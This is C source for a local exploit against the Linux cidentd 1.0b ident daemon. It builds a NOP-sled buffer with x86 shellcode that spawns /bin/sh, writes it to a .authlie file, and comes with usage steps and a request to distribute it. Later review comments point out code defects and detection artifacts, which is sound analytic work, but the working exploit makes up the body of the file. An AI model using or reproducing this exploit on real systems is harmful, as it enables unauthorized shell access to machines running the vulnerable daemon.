/*  linux cidentd 1.0b exploit I
 *  By Jackal (jackal@hack.gr) & mastoras (mastoras@hack.gr)
 *
 *  Greetz to:
 *  KoD, DiJ, m0nty, Synner, Egofan, guys at #grhack & users of hack.gr
 * 
 *  Compile it and run it in your $HOME directory. It should creat()
 *  an .authlie file. Then e.x. "telnet localhost 110", find your port
 *  by using netstat(8), "telnet localhost 113", give the ports and
 *  you're done. (test it with "id;")
 *
 *  Some code is of course stolen.
 *
 *  Oh, please distribute this :-p
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE            1060
#define NOP                            0x90

/*
 * Opaque x86 machine-code byte string, left verbatim.
 *
 * NOTE(review): the final literal is "0", i.e. the character 0x30, not an
 * escaped NUL. The only NUL in the array is the string's own terminator, so
 * the strlen(shellcode) used in main() counts every byte written above.
 * From a detection standpoint this byte sequence, together with the
 * ".authlie" file that main() creates, is the file's identifying artifact.
 */
char shellcode[] =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";

/*
 * Returns (an approximation of) the caller's stack pointer.
 *
 * NOTE(review): there is no C-level `return`. The function relies on the
 * inline `movl %esp,%eax` leaving %esp in %eax, the 32-bit x86 return
 * register, and then falling off the end. Using the value of a non-void
 * function that ends without `return` is undefined behaviour; the asm has
 * no output operand, so the compiler may clobber %eax before the epilogue,
 * and the instruction is 32-bit-only (on x86-64 it would not yield the
 * full stack pointer). This is the classic Aleph One idiom, not a
 * reliable way to read the stack pointer.
 */
unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

/*
 * Builds a bsize-byte payload (repeated address guess, NOP run, shellcode)
 * and writes it to ./.authlie in the current directory.
 *
 * argv[1] (optional): buffer size, default DEFAULT_BUFFER_SIZE.
 * argv[2] (optional): offset subtracted from get_sp(), default DEFAULT_OFFSET.
 *
 * NOTE(review), defects visible in this block:
 *  - `void main` is non-standard; the exit status is unspecified.
 *  - strlen() is used but <string.h> is not included, so it is implicitly
 *    declared (invalid since C99).
 *  - bsize/offset come from atoi() with no range check: a zero or negative
 *    bsize makes malloc(bsize) and every loop bound below misbehave.
 *  - creat()/write()/close() return values are never checked; a failed
 *    creat() returns -1 and the write() then silently fails.
 *  - The malloc-failure path prints a message but exit(0)s with success.
 *  - From a detection standpoint, an unexpected ".authlie" file consisting
 *    mostly of 0x90 bytes and a repeated 4-byte value is the artifact this
 *    program leaves behind.
 */
void main(int argc, char *argv[])
{
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    int i;
    int fd;

    /* atoi() reports no errors; non-numeric input silently becomes 0. */
    if (argc > 1)
	bsize = atoi(argv[1]);
    if (argc > 2)
	offset = atoi(argv[2]);

    if (!(buff = malloc(bsize))) {
	printf("Can't allocate memory.\n");
	exit(0);	/* NOTE(review): exit status 0 on failure */
    }
    addr = get_sp() - offset;
    /* NOTE(review): %x expects unsigned int but addr is long — format mismatch. */
    printf("Using address: 0x%x\n", addr);

    /*
     * Fill the whole buffer with `addr`, one long per store.
     * NOTE(review): the index advances 4 bytes per iteration but each store
     * writes sizeof(long) bytes. With an 8-byte long this writes twice the
     * allocation; even with a 4-byte long, a bsize that is not a multiple of
     * 4 overruns the allocation by up to 3 bytes.
     */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
	*(addr_ptr++) = addr;

    /* Overwrite the first half with NOP (0x90) bytes. */
    for (i = 0; i < bsize / 2; i++)
	buff[i] = NOP;

    /*
     * Copy the shellcode so it is centred on the middle of the buffer.
     * NOTE(review): no check that strlen(shellcode) fits in bsize; a small
     * bsize on the command line makes this copy run past the allocation.
     */
    ptr = buff + ((bsize / 2) - (strlen(shellcode) / 2));
    for (i = 0; i < strlen(shellcode); i++)
	*(ptr++) = shellcode[i];

    /* Terminate the buffer, clobbering the last byte of the final address copy. */
    buff[bsize - 1] = '\0';

    /* Write the payload to .authlie in the cwd; fd is not checked for -1. */
    fd = creat(".authlie", 0644);
    write(fd, buff, bsize);
    close(fd);
}
